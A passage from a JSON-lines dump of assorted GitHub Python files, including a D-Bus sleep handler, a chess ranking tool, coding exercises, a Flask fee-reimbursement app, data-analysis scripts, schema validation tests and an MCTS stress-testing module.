Cloud StudentS have the tesT \"\nparagraph(a)\nprintLine(a)\n","repo_name":"vrindabhatia999/Python_Projects","sub_path":"AIS_interview_ques/Console_application.py","file_name":"Console_application.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"28886081592","text":"import io\nimport os\nimport threading\nimport time\n\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\nfrom gi.repository import GLib\n\n\nclass DbusPrepareForSleepHandler():\n\n def __init__(self) -> None:\n\n self._fd: io.TextIOWrapper = None\n DBusGMainLoop(set_as_default=True)\n self._bus = dbus.SystemBus()\n\n def aquireLock(self) -> None:\n\n obj = self._bus.get_object(\n \"org.freedesktop.login1\", \"/org/freedesktop/login1\")\n inhibit = obj.get_dbus_method(\n \"Inhibit\", \"org.freedesktop.login1.Manager\")\n fd = inhibit(dbus.String(\"sleep\"), dbus.String(\"who\"),\n dbus.String(\"why\"), dbus.String(\"delay\"))\n self._fd = os.fdopen(fd.take())\n\n def releaseLock(self) -> None:\n\n try:\n if self._fd:\n self._fd.close()\n\n except:\n pass\n\n def handleSleep(self):\n\n def _prepareForSleep(prepareForSleep: 'dbus.Boolean') -> None:\n\n if bool(prepareForSleep):\n # check occupation\n # if occupied\n # - don't release lock\n # else if not occupied\n # - calculate when to wake up and set rtc\n # - perform pre-actions\n # - release lock\n print(\"prepare for sleep 1\")\n time.sleep(10)\n self.releaseLock()\n print(\"prepare for sleep 2\")\n\n else:\n print(\"prepare after sleep 1\")\n self.aquireLock()\n # perform wakeup actions\n time.sleep(10)\n print(\"prepare after sleep 2\")\n\n self._bus.add_signal_receiver(\n _prepareForSleep,\n 'PrepareForSleep',\n 'org.freedesktop.login1.Manager',\n 'org.freedesktop.login1'\n )\n\n loop = GLib.MainLoop()\n t = threading.Thread(target=loop.run)\n t.start()\n\nif __name__ == \"__main__\":\n\n handler = DbusPrepareForSleepHandler()\n handler.handleSleep()\n # handler.aquireLock()\n pass","repo_name":"Heckie75/homeserver-power-saver","sub_path":"test/test.dbus.py","file_name":"test.dbus.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39974815694","text":"# a = [['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_'],['_', '_', '_']]\n\n# [print(i) for i in a]\nfrom random import randint\n\n# field = [[\"*\" for j in range(5)] for i in range(5)]\n\n# print(field)\n\ndef ran(size):\n return randint(0, size-1)\n\nsize = 10\na = []\n[a.append(['_'] * size) for _ in range(size)]\nplayer = 'X'\ngenerate = [ran(size), ran(size)]\na[generate[0]][generate[1]] = player\n[print(i) for i in a]\n","repo_name":"Kris465/MemoryBox","sub_path":"TheGame/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5533040274","text":"from pprint import pprint\n\n\nclass PlayerStatus:\n def __init__(self, name):\n self.name = name\n self.points = 0\n self.resistance_points = 0\n self.sonnenborn_berger = 0\n self.black = 0\n self.won_against = set()\n self.lost_against = set()\n self.tied_against = set()\n\n def __repr__(self):\n return (f'name={self.name}, '\n f'points={self.points}, '\n f'resistance={self.resistance_points}, '\n f'sonnenborn={self.sonnenborn_berger}, '\n f'black={self.black}, '\n 
f'won_against={self.won_against}, '\n                f'lost_against={self.lost_against}, '\n                f'tied_against={self.tied_against}, '\n                f'opponents={self.opponents}')\n\n    def __lt__(self, other):\n        # Tie-break in order: points, resistance, Sonneborn-Berger, games played as black.\n        if self.points != other.points:\n            return self.points > other.points\n        if self.resistance_points != other.resistance_points:\n            return self.resistance_points > other.resistance_points\n        if self.sonnenborn_berger != other.sonnenborn_berger:\n            return self.sonnenborn_berger > other.sonnenborn_berger\n        return self.black > other.black\n\n    @property\n    def opponents(self):\n        return self.lost_against.union(self.won_against).union(self.tied_against)\n\n\ndef splitting_input(input_: str):\n    \"\"\"split the input string on every blank line\"\"\"\n    data = [e.strip() for e in input_.split('\\n\\n')]\n    names = data[0].split()\n    rounds = []\n    data = data[1:]\n    data = [e.split('\\n') for e in data]\n\n    for round_ in data:\n        rounds.append([match.split() for match in round_])\n    return names, rounds\n\n\ndef creating_dictionary(player_list):\n    \"\"\"creating a dictionary of player names from a parsed list\"\"\"\n    ret = {player_name: PlayerStatus(player_name) for player_name in player_list}\n    return ret\n\n\ndef parse_data(rounds):\n    for round_ in rounds:\n        for match in round_:\n            white = match[0]\n            black = match[1]\n            # compare scores numerically rather than as strings\n            white_points = float(match[2])\n            black_points = float(match[3])\n            player_dict[black].black += 1\n\n            if white_points > black_points:\n                player_dict[white].won_against.add(black)\n                player_dict[black].lost_against.add(white)\n            elif white_points < black_points:\n                player_dict[black].won_against.add(white)\n                player_dict[white].lost_against.add(black)\n            elif white_points == black_points:\n                player_dict[white].tied_against.add(black)\n                player_dict[black].tied_against.add(white)\n            else:\n                raise ValueError(\"Should not happen :O\")\n\n\ndef points():\n    for player in players:\n        points = len(player_dict[player].won_against) + 0.5 * len(player_dict[player].tied_against)\n        player_dict[player].points = points\n\n\ndef resistance_points():\n    for player in players:\n        for opponent in player_dict[player].opponents:\n            player_dict[player].resistance_points += player_dict[opponent].points\n\n    # player_dict[player]['resistance_points'] = sum(\n    #     [player_dict[opponent]['points'] for opponent in player_dict[player]['opponents']]\n    # )\n\n\ndef sonnenborn_points():\n    for player in players:\n        for opponents in player_dict[player].won_against:\n            player_dict[player].sonnenborn_berger += 1 * player_dict[opponents].points\n        for opponents in player_dict[player].tied_against:\n            player_dict[player].sonnenborn_berger += 0.5 * player_dict[opponents].points\n\n\nif __name__ == '__main__':\n    with open('input_text.txt') as f:\n        input_string = f.read()\n\n    players, rounds = splitting_input(input_string)\n    player_dict = creating_dictionary(players)\n\n    parse_data(rounds)\n    points()\n    resistance_points()\n    sonnenborn_points()\n    pprint(sorted(player_dict.values()))","repo_name":"LCCLS/Chess_Ranking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2578540596","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Return the number of even ints in the given array. Note: the % \"mod\" operator computes the remainder, e.g. 
5 % 2 is 1\n\n# # def count_evens(nums):\n# count = 0\n# for n in nums:\n# count -= n%2-1\n# return count\n# count_evens([2, 1, 2, 3, 4])\n# \n\n# # Return the sum of the numbers in the array, except ignore sections of numbers starting with a 6 and extending to the next 7 (every 6 will be followed by at least one 7). Return 0 for no numbers.\n\n# In[2]:\n\n\ndef sum67(nums):\n count =0\n blocked= False\n for n in nums:\n if n == 6:\n blocked = True\n continue\n if n == 7 and blocked:\n blocked = False\n continue\n if not blocked: \n count += n\n \n return count\nsum67([1, 2, 2, 6, 99, 99, 7])\n\n\n# # Given an array length 1 or more of ints, return the difference between the largest and smallest values in the array. Note: the built-in min(v1, v2) and max(v1, v2) functions return the smaller or larger of two values.\n\n# In[4]:\n\n\ndef big_diff(nums):\n return max(nums)-min(nums)\n\nbig_diff([7, 2, 10, 9]) \n\n\n# # Given an array of ints, return True if the array contains a 2 next to a 2 somewhere.\n# \n# \n\n# In[5]:\n\n\ndef has22(nums):\n for i,v in enumerate(nums[:-1]):\n if v == 2 and nums[i+1] == 2:\n return True\n return False\n\nhas22([1, 2, 1, 2]) \n\n\n\n\n\n","repo_name":"amod26/PythonPrac","sub_path":"List2.py","file_name":"List2.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10214194285","text":"from typing import List\n\n\nclass Vertex:\n def __init__(self, val: str):\n self.val = val\n self.distance = 999\n self.neighbors = []\n self.visited = False\n def add_neighbor(self, v):\n if v not in self.neighbors:\n self.neighbors.append(v)\n\nclass Graph:\n def __init__(self):\n self.vertices = {}\n def add_vertex(self, v: Vertex) -> bool:\n if v.val not in self.vertices:\n self.vertices[v.val] = v\n return True\n return False\n def add_egde(self, u: Vertex, v: Vertex):\n if u in self.vertices and v in self.vertices:\n self.vertices.get(u).add_neighbor(self.vertices.get(v))\n self.vertices.get(v).add_neighbor(self.vertices.get(u))\n return True\n return False\n def print_graph(self):\n for key in self.vertices:\n print(key,\" \", self.vertices[key].neighbors)\n def bfs(self, v: Vertex):\n q = list()\n q.append(v)\n v.visited = True\n while len(q)>0:\n curr = q.pop(0)\n\n print(curr.val)\n for vertex in curr.neighbors:\n if(not vertex.visited):\n q.append(vertex)\n vertex.visited = True\n\n\n\n\n\ng= Graph()\na= Vertex('A')\nb= Vertex('B')\nc= Vertex('C')\n\ng.add_vertex(a)\ng.add_vertex(b)\ng.add_vertex(c)\nfor i in range(ord('A'), ord('E')):\n g.add_vertex(Vertex(chr(i)))\nedges = ['AB', \"BC\", \"CA\", \"AD\", \"BE\"]\nfor edge in edges:\n g.add_egde(edge[:1],edge[1:])\n#g.print_graph()\ng.bfs(a)\n","repo_name":"gemmechu/competitiveProgramming","sub_path":".UdemyCourse/Graph/Bfs.py","file_name":"Bfs.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29194974291","text":"\"\"\" Feature engineering using a wrapper for Technical Analysis package\n\"\"\"\n\nfrom pathlib import Path\nparent = Path(__file__).resolve().parent\nsrcPath = str(parent.parent).replace(\"\\\\\", \"\\\\\\\\\")\nimport sys\nsys.path.insert(0, srcPath)\n\nimport pandas as pd\nfrom ta import add_all_ta_features\nfrom ta.utils import dropna\n\nfrom elk import search\n\ndef all_features(dataframe):\n \"\"\" Compute technical features using Technical Analysis package\n\n Args:\n dataframe 
(Dataframe.Object): raw dataframe\n\n Returns:\n Dataframe.Object: dataframe with additional features\n \"\"\" \n # Map column labels\n labels = {\n 'open': 'open',\n 'high': 'high',\n 'low': 'low',\n 'close': 'adjusted_close',\n 'volume': 'volume',\n }\n # Delete unecessary columns\n del dataframe['close']\n del dataframe['dividend_amount']\n del dataframe['split_coefficient']\n dataframe = dataframe.rename(columns={'day': 'date'})\n # Clean NaN values\n df = dropna(dataframe)\n # Add ta features filling NaN values\n return add_all_ta_features(df, open=labels['open'], high=labels['high'], low=labels['low'], close=labels['close'], volume=labels['volume'], fillna=True)","repo_name":"abremard/AI_Alternative_Trading","sub_path":"src/ohlc/technical_analysis.py","file_name":"technical_analysis.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"70944593377","text":"import pandas as pd\nimport numpy as np\nfrom scipy import stats\n\nfrom compare_subsets import make_subset, make_histograms\n\n# get subsets by sex\n# subset_pairs = [['women', 'men'], ['women_did_not_know', 'men_did_not_know'], ['women_may_have_known', 'men_may_have_known']]\nsubset_pairs = [['women_did_not_know', 'men_did_not_know']]\ndata = pd.read_csv('../araihazar-data/to_analyze/data_for_regressions.csv')\n\nfor subset_pair in subset_pairs:\n data_pair = {}\n count = {}\n well_as = {}\n well_as_variances = {}\n urine_as = {}\n urine_as_variances = {}\n for subset in subset_pair:\n # get subset of data\n data_pair[subset] = make_subset(data, subset)\n count[subset] = len(data_pair[subset].index)\n # get well As variance\n well_as[subset] = data_pair[subset].arsenic_ugl\n well_as_variances[subset] = np.var(data_pair[subset].arsenic_ugl)\n\n # get urine As variance\n urine_as[subset] = data_pair[subset].urine_as\n urine_as_variances[subset] = np.var(data_pair[subset].urine_as)\n # compare variances\n print(well_as[subset_pair[0]].head())\n print(well_as[subset_pair[1]].head())\n well_as_W, well_as_p = stats.levene(well_as[subset_pair[0]], well_as[subset_pair[1]], center='median')\n print(well_as_p)\n ur_as_W, ur_as_p = stats.levene(urine_as[subset_pair[0]], urine_as[subset_pair[1]], center='median')\n print(ur_as_p)\n # make histograms\n # print(well_as[subset_pair[0]])\n make_histograms(data_pair[subset_pair[0]], subset_pair[0], data_pair[subset_pair[1]], subset_pair[1], 0, 5000, 'arsenic_ugl')\n make_histograms(data_pair[subset_pair[0]], subset_pair[0], data_pair[subset_pair[1]], subset_pair[1], 0, 5000, 'urine_as')\n # save data to table\n index = [subset_pair[0], subset_pair[1], 'W', 'p']\n columns = ['primary well As variance', 'urinary As variance', 'n']\n out_data = pd.DataFrame(index=index, columns=columns)\n out_data.loc[subset_pair[0]] = [well_as_variances[subset_pair[0]], urine_as_variances[subset_pair[0]], count[subset_pair[0]]]\n out_data.loc[subset_pair[1]] = [well_as_variances[subset_pair[1]], urine_as_variances[subset_pair[1]], count[subset_pair[1]]]\n out_data.loc['W'] = [well_as_W, ur_as_W, np.nan]\n out_data.loc['p'] = [well_as_p, ur_as_p, np.nan]\n out_data.to_csv(f'../araihazar-data/analysis_output/variances_{subset_pair[0]}_{subset_pair[1]}.csv')\n\n","repo_name":"lhuhmann/araihazar","sub_path":"variance_by_sex.py","file_name":"variance_by_sex.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} 
+{"seq_id":"30646088965","text":"import os\nimport datetime\nimport simplejson\n\nfrom flask import request, current_app, make_response, send_from_directory\nfrom flask_login import login_required, current_user\nfrom werkzeug.utils import secure_filename\n\nfrom .. import db\nfrom . import fee,config\nfrom .models import Fee\nfrom ..public.models import User\nfrom ..public.mail import send_email\nfrom ..public.utils import record_error\nfrom .app import handle_balance\n\n\n@fee.route('', methods=['GET'])\ndef bill():\n try:\n bills = Fee.query.filter_by(stat=1).order_by(Fee.id.desc())\n if bills:\n surplus = bills[0].balance\n amount = bills.count()\n\n return simplejson.dumps({\n 'bills': [\n {\n 'item': bill.item,\n 'date': bill.date,\n 'detail': bill.detail,\n 'account': bill.account,\n 'balance': bill.balance\n\n } for bill in bills\n ],\n 'surplus': surplus,\n 'amount': amount\n })\n else:\n return ''\n except Exception as e:\n record_error(e)\n return '',404\n\n\n@login_required\n@fee.route('', methods=['POST'])\ndef account():\n fee = Fee()\n try:\n account_form = dict(request.form)\n fee.item = account_form['item']\n account_value = float(account_form['account'])\n fee.payer = current_user.name\n\n if account_form['action'] == 'disburse':\n fee.date = account_form['date']\n fee.detail = '-'+account_form['detail']\n fee.account = account_value*(-1)\n fee.stat = 0\n\n fee.balance = 0\n db.session.add(fee)\n db.session.commit()\n\n uploads_path = config['FEE_PATH'] + str(fee.id)\n os.mkdir(uploads_path)\n\n for account_file in request.files.getlist('file'):\n base_path = os.path.dirname(config['FEE_PATH'])\n uploads_path = os.path.join(base_path, str(fee.id), secure_filename(account_file.filename))\n account_file.save(uploads_path)\n\n target = User.query.filter_by(role='生活委员').first().email\n # send_email([target],\n # current_user.name+'申请报销'+account_form['item'],\n # '支付详情:'+account_form['detail']+'\\n'+'支付金额:'+account_form['account'],\n # current_app._get_current_object()\n # )\n\n return simplejson.dumps({\n 'result': '提交成功,等待审核',\n 'id':fee.id\n })\n\n else:\n if current_user.role != '生活委员':\n return '您不具有添加收入记录的权限', 403\n fee.date = datetime.datetime.now(\n datetime.timezone(\n datetime.timedelta(hours=8)\n )\n ).date()\n fee.detail = account_form['detail']\n fee.account = account_form['account']\n\n old_balance = Fee.query.filter_by(stat=1).order_by(Fee.id.desc()).first()\n if old_balance:\n old_balance = old_balance.balance\n fee.balance = old_balance + account_value\n else:\n fee.balance = 0 + account_value\n fee.stat=1\n db.session.add(fee)\n db.session.commit()\n\n return simplejson.dumps({\n 'result': '提交成功',\n 'id': fee.id\n })\n\n except Exception as e:\n record_error(e)\n return simplejson.dumps({\n 'result': 'error'\n }), 401\n\n\n@fee.route('/audit', methods=['GET'])\ndef audit_msg():\n try:\n auditings = Fee.query.filter_by(stat=0).order_by(Fee.id.desc())\n auditeds = Fee.query.filter_by(stat=1).order_by(Fee.id.desc())\n auditfails = Fee.query.filter_by(stat=2).order_by(Fee.id.desc())\n\n adtings, adteds, adtfails = map(lambda x:[ {\n 'id': bill.id,\n 'item': bill.item,\n 'date': bill.date,\n 'account': bill.account,\n 'payer': bill.payer,\n 'materials': os.listdir(config['FEE_PATH'] + str(bill.id)) if bill.account < 0 else []\n }for bill in x],\n [auditings, auditeds, auditfails])\n\n return simplejson.dumps({\n 'auditings': adtings,\n 'auditeds': adteds,\n 'auditfails': adtfails\n })\n except Exception as e:\n record_error(e)\n return '' ,404\n\n\n@fee.route('/', 
methods=['GET'])\ndef show(id,filename):\n try:\n materials_path = config['FEE_PATH'] + str(id)\n\n response = make_response(send_from_directory(materials_path, filename, as_attachment=True))\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1'))\n return response\n\n except Exception as e:\n record_error(e)\n return '' ,404\n\n\n@login_required\n@fee.route('/audit', methods=['POST'])\ndef audit():\n try:\n if current_user.role != '生活委员':\n return 'no privilege', 403\n payload=simplejson.loads(request.data)\n handle_balance(payload['id'],payload['action'])\n\n return 'ok',200\n except Exception as e:\n record_error(e)\n return 'BadRequest' ,502","repo_name":"SRE312/ClassIS","sub_path":"backend/ClassISapp/fee/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"43628112455","text":"from utils.parse import Parser\nfrom itertools import combinations\nfrom operator import itemgetter\n\n\nclass Vector:\n def __init__(self, x=0, y=0, z=0):\n self.x = x\n self.y = y\n self.z = z\n\n @property\n def tuple(self):\n return self.x, self.y, self.z\n\n @property\n def energy(self):\n return abs(self.x) + abs(self.y) + abs(self.z)\n\n def apply(self, vec):\n self.x += vec.x\n self.y += vec.y\n self.z += vec.z\n\n\nclass Moon:\n def __init__(self, pos):\n self.__pos = pos\n self.__velocity = Vector()\n\n @property\n def position(self):\n return self.__pos.tuple\n\n @property\n def total_energy(self):\n return self.__pos.energy * self.__velocity.energy\n\n def apply_gravity(self, gravity):\n self.__velocity.apply(gravity)\n\n def apply_velocity(self):\n self.__pos.apply(self.__velocity)\n\n\ndef axis_gravity(a, b):\n if a < b:\n return 1, -1\n\n elif a > b:\n return -1, 1\n\n return 0, 0\n\n\ndef do_time_step(moons):\n for moon_a, moon_b in combinations(moons, 2):\n gravity = [axis_gravity(c_a, c_b) for c_a, c_b in zip(\n moon_a.position, moon_b.position)]\n grav_a = Vector(*map(itemgetter(0), gravity))\n grav_b = Vector(*map(itemgetter(1), gravity))\n moon_a.apply_gravity(grav_a)\n moon_b.apply_gravity(grav_b)\n\n for m in moons:\n m.apply_velocity()\n\n\nparser = Parser(\"Day 12: The N-Body Problem - Part 1\")\nparser.parse()\nwith parser.input as input:\n stripped = (l.strip('<>\\n') for l in input)\n coordinates = (l.split(',') for l in stripped)\n moons = []\n for moon in coordinates:\n values = (coord.strip('xyz= ') for coord in moon)\n position = Vector(*map(int, values))\n moons.append(Moon(position))\n\nfor _ in range(1000):\n do_time_step(moons)\n\ntotal_energy = sum(m.total_energy for m in moons)\n\nprint(total_energy)\n","repo_name":"tranzystorek-io/aoc2019-python","sub_path":"days/d12p1.py","file_name":"d12p1.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4397294932","text":"\"\"\"\nHW 11.3\n(Sort students by grades)\nRewrite Listing 11.2, GradeExam.py, to display the students in increasing\norder of the number of correct answers.\n\"\"\"\n\n\ndef main():\n # Students' answers to the questions\n answers = [\n ['A', 'B', 'A', 'C', 'C', 'D', 'E', 'E', 'A', 'D'],\n ['D', 'B', 'A', 'B', 'C', 'A', 'E', 'E', 'A', 'D'],\n ['E', 'D', 'D', 'A', 'C', 'B', 'E', 'E', 'A', 'D'],\n ['C', 'B', 'A', 'E', 'D', 'C', 'E', 'E', 'A', 'D'],\n ['A', 'B', 'D', 'C', 'C', 'D', 'E', 'E', 'A', 'D'],\n ['B', 'B', 'E', 'C', 
'C', 'D', 'E', 'E', 'A', 'D'],\n        ['B', 'B', 'A', 'C', 'C', 'D', 'E', 'E', 'A', 'D'],\n        ['E', 'B', 'E', 'C', 'C', 'D', 'E', 'E', 'A', 'D']]\n\n    # Key to the questions\n    keys = ['D', 'B', 'D', 'C', 'C', 'D', 'A', 'E', 'A', 'D']\n\n    student_scores = []\n\n    # Grade all answers\n    for i in range(len(answers)):\n        # Grade one student\n        correctCount = 0\n        for j in range(len(answers[i])):\n            if answers[i][j] == keys[j]:\n                correctCount += 1\n\n        # Append student score/number pair list to a list\n        student_scores.append([correctCount, i])\n\n    # Sort score/student pairs by score, ascending, so students print in increasing order of correct answers (as the assignment asks)\n    student_scores.sort()\n\n    # Prints student number and score values\n    for i in range(len(student_scores)):\n        print(\"Student\", str(student_scores[i][1]) + \"'s correct count is\",\n              student_scores[i][0])\n\n\nmain()  # Call the main function\n","repo_name":"James-E-Sullivan/BU-MET-CS521","sub_path":"Module-4/HW_11.3_Sullivan_James.py","file_name":"HW_11.3_Sullivan_James.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35459741843","text":"\r\nimport speech_recognition as sr\r\nfrom googletrans import Translator\r\n\r\n\r\ndef listen():\r\n    r = sr.Recognizer()\r\n    with sr.Microphone() as source:\r\n        print(\"Listening...\")\r\n        r.pause_threshold = 1\r\n        audio = r.listen(source, 0, 4)\r\n    try:\r\n        print(\"Recognizing...\")\r\n        query = r.recognize_google(audio, language=\"en-in\")\r\n    except Exception:\r\n        # recognition failed; fall back to an empty query\r\n        return \"\"\r\n    query = str(query)\r\n    return query.lower()\r\n\r\n\r\ndef TranslationHinToEng(Text):\r\n    line = str(Text)\r\n    translate = Translator()\r\n    result = translate.translate(line)\r\n    data = result.text\r\n    print(f\"you :{data}.\")\r\n    # print(f\"you : {data}.\")\r\n    return data\r\n\r\n\r\ndef MicExecution():\r\n    query = listen()\r\n    data = TranslationHinToEng(query)\r\n    return data\r\n\r\n\r\nMicExecution()\r\n\r\n","repo_name":"Rahul-Lohar/NLJarvis","sub_path":"NLJarvis/Listen.py","file_name":"Listen.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"26110590262","text":"import sys\nimport unittest\nfrom unittest.mock import MagicMock, patch\nfrom nose.tools import assert_true\nfrom nose.tools import assert_false\nfrom pjxxs import fields\n\n\nmocked_mod_name = \"mocked\"\nmocked = MagicMock()\ninner_mocked = MagicMock()\ninner_mocked.schema = fields.Schema(\"inner_mocked\", 1)\ninner_mocked.schema.add_field(fields.Object(\"inner_object\"))\ninner_mocked.schema.add_field(\n\tfields.Enum(\n\t\t\"inner_enum\", required=True, allowed_values=[\"ONE\", \"TWO\"]\n\t)\n)\n\nwith patch.dict(\"sys.modules\", mocked=mocked, inner_mocked=inner_mocked):\n\tmocked.schema = fields.Schema(mocked_mod_name, 1)\n\tmocked.schema.add_field(fields.Object(\"mocked_object\"))\n\tmocked.schema.add_field(\n\t\tfields.SchemaType(\"inner_mocked\", \"inner_mocked\", nullable=False)\n\t)\n\n\nclass TestValidation(unittest.TestCase):\n\tdef setUp(self):\n\t\twith patch.dict(\"sys.modules\", mocked=mocked):\n\t\t\tschema = fields.Schema(\"main/schema\", 1)\n\t\t\tschema.add_field(\n\t\t\t\tfields.SchemaType(\"level_1\", mocked_mod_name, required=True)\n\t\t\t)\n\t\t\tself.schema = schema\n\t\t\t# print(\"\\nDUMP\", self.schema.to_json(sort_keys=True, indent=4))\n\n\tdef test_001_validate_ok(self):\n\t\tcases = 
[\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tmocked_object={},\n\t\t\t\t\tinner_mocked=dict(\n\t\t\t\t\t\tinner_object={},\n\t\t\t\t\t\tinner_enum=\"ONE\"\n\t\t\t\t\t),\n\t\t\t\t)\n\t\t\t),\n\t\t]\n\t\tfor data in cases:\n\t\t\tok = self.schema.validate(data)\n\t\t\t# print(self.schema.get_errors())\n\t\t\tassert_true(ok)\n\n\tdef test_002_validate_str_nok(self):\n\t\tcases = [\n\t\t\tdict(\n\t\t\t\tlevel_1=123\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1={}\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t)\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tinner_mocked=None\n\t\t\t\t)\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tinner_mocked=dict()\n\t\t\t\t)\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tmocked_object={},\n\t\t\t\t\tinner_mocked=dict(\n\t\t\t\t\t\tinner_object=None,\n\t\t\t\t\t\tinner_enum=\"INVALID\"\n\t\t\t\t\t)\n\t\t\t\t),\n\t\t\t),\n\t\t]\n\t\tfor data in cases:\n\t\t\tok = self.schema.validate(data)\n\t\t\t# print(self.schema.get_errors(as_json=True))\n\t\t\tassert_false(ok)\n","repo_name":"mcptr/pjxxs","sub_path":"test/schema/fields/test_validation_schema_type.py","file_name":"test_validation_schema_type.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37439544184","text":"import pickle\n\nimport numpy as np\n# import garage.misc.logger as logger\nfrom dowel import logger\nfrom dowel import tabular\n\nimport ast_toolbox.mcts.MDP as MDP\n\n\nclass ASTParams:\n \"\"\"Structure that stores internal parameters for AST.\n\n Parameters\n ----------\n max_steps : int, optional\n The maximum search depth.\n\n \"\"\"\n\n def __init__(self, max_steps, log_interval, log_tabular, log_dir=None, n_itr=100):\n self.max_steps = max_steps\n self.log_interval = log_interval\n self.log_tabular = log_tabular\n self.log_dir = log_dir\n self.n_itr = n_itr\n\n\nclass AdaptiveStressTest:\n \"\"\"The AST wrapper for MCTS using the actions in env.action_space.\n\n Parameters\n ----------\n p : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTParams`\n The AST parameters\n env : :py:class:`ast_toolbox.envs.go_explore_ast_env.GoExploreASTEnv`.\n The environment.\n top_paths : :py:class:`ast_toolbox.mcts.BoundedPriorityQueues`, optional\n The bounded priority queue to store top-rewarded trajectories.\n \"\"\"\n\n def __init__(self, p, env, top_paths):\n self.params = p\n self.env = env\n self.sim_hash = hash(0)\n self.transition_model = self.transition_model()\n self.step_count = 0\n self._isterminal = False\n self._reward = 0.0\n self.action_seq = []\n self.trajectory_reward = 0.0\n self.top_paths = top_paths\n self.iter = 0\n self.isInitialize = True\n\n def reset_step_count(self):\n \"\"\"Reset the env step count.\n \"\"\"\n self.step_count = 0\n\n def initialize(self):\n \"\"\"Initialize training variables.\n\n Returns\n ----------\n env_reset :\n The reset result from the env.\n \"\"\"\n self._isterminal = False\n self._reward = 0.0\n if self.iter == 0 and self.isInitialize:\n reward_file = open(\"mcts_rewards.txt\", \"a\")\n reward_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n reward_file.close()\n paths_file = open(\"mcts_paths.txt\", \"a\")\n paths_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n paths_file.close()\n crash_file = open(\"mcts_crashes.txt\", \"a\")\n crash_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n crash_file.close()\n self.isInitialize = False\n self.action_seq = []\n 
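        # accumulate the rollout's reward from zero; update() adds per-step rewards and enqueues the finished trajectory into top_paths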
self.trajectory_reward = 0.0\n return self.env.reset()\n\n def update(self, action):\n \"\"\"Update the environment as well as the assosiated parameters.\n\n Parameters\n ----------\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The AST action.\n\n Returns\n ----------\n obs : :py:class:`numpy.ndarry`\n The observation from the env step.\n reward : float\n The reward from the env step.\n done : bool\n The terminal indicator from the env step.\n info : dict\n The env info from the env step.\n \"\"\"\n self.step_count += 1\n obs, reward, done, info = self.env.step(action.get())\n self._isterminal = done\n self._reward = reward\n self.action_seq.append(action)\n self.trajectory_reward += reward\n if done:\n self.top_paths.enqueue(self.action_seq, self.trajectory_reward, make_copy=True)\n self.logging()\n return obs, reward, done, info\n\n def logging(self):\n \"\"\"Logging the training information.\n \"\"\"\n if self.params.log_tabular and self.iter <= self.params.n_itr:\n if self.step_count % self.params.log_interval == 0:\n self.iter += 1\n reward_file = open(\"mcts_rewards.txt\", \"a\")\n reward_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n reward_file.close()\n path_file = open(\"mcts_paths.txt\", \"a\")\n path_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n path_file.close()\n crash_file = open(\"mcts_crashes.txt\", \"a\")\n crash_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n crash_file.close()\n logger.log(' ')\n tabular.record('StepNum', self.step_count)\n record_num = 0\n if self.params.log_dir is not None:\n if self.step_count == self.params.log_interval: # first time logging\n best_actions = []\n else:\n with open(self.params.log_dir + '/best_actions.p', 'rb') as f:\n best_actions = pickle.load(f)\n\n best_actions.append(np.array([x.get() for x in self.top_paths.pq[0][0]]))\n with open(self.params.log_dir + '/best_actions.p', 'wb') as f:\n pickle.dump(best_actions, f)\n\n for (topi, path) in enumerate(self.top_paths):\n tabular.record('reward ' + str(topi), path[1])\n record_num += 1\n\n for topi_left in range(record_num, 